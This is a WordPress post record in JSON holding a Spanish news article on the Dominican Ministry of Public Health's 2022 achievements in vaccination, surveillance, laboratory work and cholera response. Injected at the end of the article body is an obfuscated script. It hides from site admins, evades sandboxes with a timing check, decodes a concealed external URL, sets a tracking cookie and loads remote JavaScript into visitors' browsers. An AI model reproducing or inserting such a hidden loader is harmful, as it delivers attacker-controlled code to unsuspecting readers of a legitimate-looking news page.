{"id":13067,"date":"2023-01-04T15:23:17","date_gmt":"2023-01-04T19:23:17","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13067"},"modified":"2023-01-04T15:23:17","modified_gmt":"2023-01-04T19:23:17","slug":"ministerio-de-salud-publica-destaca-logros-alcanzados-durante-2022","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13067","title":{"rendered":"Ministerio de Salud P\u00fablica destaca logros alcanzados durante 2022"},"content":{"rendered":"<p>Santo Domingo. &#8211;\u00a0<strong>El Ministerio de Salud P\u00fablica y Asistencia Social (MISPAS)\u00a0<\/strong>realiz\u00f3 este mi\u00e9rcoles un recuento de los\u00a0<strong>logros alcanzados durante el pasado a\u00f1o 2022<\/strong>, destacando importantes avances en cuanto a\u00a0<strong>inmunizaci\u00f3n, aplicaci\u00f3n de vacunas, vigilancia epidemiol\u00f3gica<\/strong>\u00a0y notificaci\u00f3n de enfermedades.<\/p>\n<p>Asimismo, procesamiento de muestras en el Laboratorio Nacional, equipamiento, habilitaci\u00f3n inspecci\u00f3n y cese de establecimientos, as\u00ed como\u00a0<strong>respuesta en materia de salud<\/strong>\u00a0ante el paso de fen\u00f3menos naturales.<\/p>\n<p>Las explicaciones fueron ofrecidas por los incumbentes de las diferentes direcciones durante la rueda de prensa de cada mi\u00e9rcoles que ofrece el organismo de Salud, donde resaltaron que\u00a0<strong>se han superado en un ciento por ciento las coberturas anteriores en vacunas.<\/strong><\/p>\n<p><strong>El viceministro de Salud Colectiva, doctor Eladio P\u00e9rez,\u00a0<\/strong>dijo que, a trav\u00e9s del\u00a0<strong>Programa de Inmunoprevenibles por Vacunas<\/strong>, ha aumentado la cobertura de inmunizaci\u00f3n contra difteria, igual que contra neumococo pentavalente y que el\u00a0<strong>pa\u00eds est\u00e1 libre de sarampi\u00f3n, rub\u00e9ola y polio<\/strong>, todos por encima del 90 % de la poblaci\u00f3n destinada.<\/p>\n<p>Manifest\u00f3 que el 80 % de los dominicanos cuenta con alguna exposici\u00f3n vacunal, destacando\u00a0<strong>inmunizaciones como la del COVID-19, que continu\u00f3 su aplicaci\u00f3n el pasado a\u00f1o<\/strong>, adem\u00e1s de los avances significativos en la cadena de fr\u00edo para su conservaci\u00f3n y los<strong>\u00a0m\u00e1s de 1,400 puntos de vacunaci\u00f3n disponibles<\/strong>\u00a0para que los dominicanos cuenten con cobertura en diferentes enfermedades.<\/p>\n<p>Indic\u00f3 que por medio de la\u00a0<strong>Organizaci\u00f3n Panamericana de la Salud<\/strong>\u00a0ser\u00e1n gestionadas\u00a0<strong>vacunas contra el c\u00f3lera,<\/strong>\u00a0que llegar\u00edan al pa\u00eds pr\u00f3ximamente para ser aplicadas a un p\u00fablico priorizado.<\/p>\n<p><strong>Vigilancia Epidemiol\u00f3gica<\/strong><\/p>\n<p>De su lado,\u00a0<strong>el director de Epidemiolog\u00eda, doctor Ronald Skewes,<\/strong>\u00a0indic\u00f3 que los avances en el Laboratorio Nacional Dr. Defill\u00f3 en la parte de\u00a0<strong>biolog\u00eda molecular<\/strong>\u00a0han permitido describir mejor lo que ha sido la pandemia del COVID-19, ya que se le ha dado el seguimiento y\u00a0<strong>se han detectado las variantes que circulan en el pa\u00eds<\/strong>. Todas las muestras fueron procesadas en el pa\u00eds en tiempo r\u00e9cord.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/DSC_0086.jpg\" alt=\"\" width=\"6192\" height=\"4128\" data-entity-type=\"file\" data-entity-uuid=\"4281412e-1e90-4601-9126-ede5ef4cee0d\" \/><\/p>\n<p><em>\u201cEsto ha permitido ofrecer una vigilancia oportuna, lo que se traduce en la toma de decisiones oportunas, en el tiempo requerido, y ver el comportamiento de las variantes\u201d<\/em>, resalt\u00f3 Skewes.<\/p>\n<p>En cuanto al\u00a0<strong>COVID-19<\/strong>\u00a0el director de Epidemiolog\u00eda inform\u00f3 que fueron procesadas unas\u00a0 877 muestras, de estas hubo 47 pruebas PCR y 830 antig\u00e9nicas, resultando positivos 32 casos, lo que sit\u00faa una\u00a0<strong>positividad de 11.30 %.<\/strong><\/p>\n<p><strong>Procesamiento de muestras<\/strong><\/p>\n<p><strong>La licenciada Ivonne Imbert, directora del Laboratorio Nacional Dr. Defill\u00f3<\/strong>, enfatiz\u00f3 los logros del centro en el pasado a\u00f1o, destac\u00e1ndose la\u00a0<strong>adquisici\u00f3n de equipos tecnol\u00f3gicos para fortalecer la capacidad de respuesta<\/strong>, as\u00ed como de un software, entrega de resultados a trav\u00e9s de la plataforma, la contrataci\u00f3n de 110 nuevos servidores p\u00fablicos, aumento de la\u00a0<strong>capacidad de procesamiento, mejora de \u00e1reas como bacteriolog\u00eda y biolog\u00eda molecular.<\/strong><\/p>\n<p>Dio detalles sobre el\u00a0<strong>procesamiento de las muestras de viruela del mono<\/strong>\u00a0y precis\u00f3 que fueron reconocidos por ser el\u00a0<strong>laboratorio que m\u00e1s ha procesado muestras de COVID-19 durante la pandemia<\/strong>, entre otros avances que no poseen laboratorios privados en el pa\u00eds.<\/p>\n<p><strong>Habilitaci\u00f3n<\/strong><\/p>\n<p>El director del departamento de Habilitaci\u00f3n y Acreditaci\u00f3n de Establecimientos y Servicios de Salud del MISPAS,\u00a0<strong>doctor Juan Gerardo Mesa P\u00e9rez,<\/strong>\u00a0destac\u00f3 que esa dependencia otorg\u00f3 558 certificaciones de No Objeci\u00f3n a Planos, ofreci\u00f3 104 asesor\u00edas presenciales, inspeccion\u00f3 1,285 establecimientos, habilit\u00f3 1,530 establecimientos y dio el\u00a0<strong>cese de servicios a otros 490 por infringir la Ley general de Salud<\/strong>, lo que se traduce en la\u00a0<strong>seguridad de los ciudadanos\u00a0<\/strong>al momento de requerir un servicio de salud en el pa\u00eds.<\/p>\n<p>Adem\u00e1s, enfatiz\u00f3 en que en el a\u00f1o 2021 se obtuvo un 72 % en la encuesta de satisfacci\u00f3n de los usuarios y este a\u00f1o es de un\u00a0<strong>92.6 %.<\/strong><em>\u00a0\u201cAdquirimos buenos resultados en todos los centros de salud como cl\u00ednicas, hospitales y laboratorios\u201d<\/em>, indic\u00f3 Mesa.<\/p>\n<p><strong>Respuesta ante desastres<\/strong>.<\/p>\n<p><strong>La doctora Gina Estrella, directora de Gesti\u00f3n de Riesgos y Atenci\u00f3n a Desastres,<\/strong>\u00a0indic\u00f3 que por medio de esa direcci\u00f3n se ha dado respuesta a eventos como el\u00a0<strong>c\u00f3lera en el sector La Zurza<\/strong>, donde inform\u00f3 que no se han notificado nuevos casos. Mientras se espera resultado de cuatro muestras,\u00a0<strong>contin\u00faa la vigilancia<\/strong>\u00a0y solo se han registrado casos de cuadros diarreicos.<\/p>\n<p>Asimismo, aclar\u00f3 que la ni\u00f1a que falleci\u00f3 en este sector el pasado 31 de diciembre, no fue por c\u00f3lera. Presentaba desnutrici\u00f3n severa y deshidrataci\u00f3n, con v\u00f3mitos y diarrea a causa de la bacteria\u00a0<em>shigella<\/em>, seg\u00fan arrojaron los resultados las pruebas de laboratorio que se le aplicaron.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211;\u00a0El Ministerio de Salud P\u00fablica y Asistencia Social (MISPAS)\u00a0realiz\u00f3 este mi\u00e9rcoles un recuento de los\u00a0logros alcanzados durante el pasado a\u00f1o 2022, destacando importantes avances en cuanto a\u00a0inmunizaci\u00f3n, aplicaci\u00f3n de vacunas, vigilancia epidemiol\u00f3gica\u00a0y notificaci\u00f3n de enfermedades. Asimismo, procesamiento de muestras en el Laboratorio Nacional, equipamiento, habilitaci\u00f3n inspecci\u00f3n y cese de establecimientos, as\u00ed como\u00a0respuesta en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13069,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13067","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13067"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13067\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13069"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}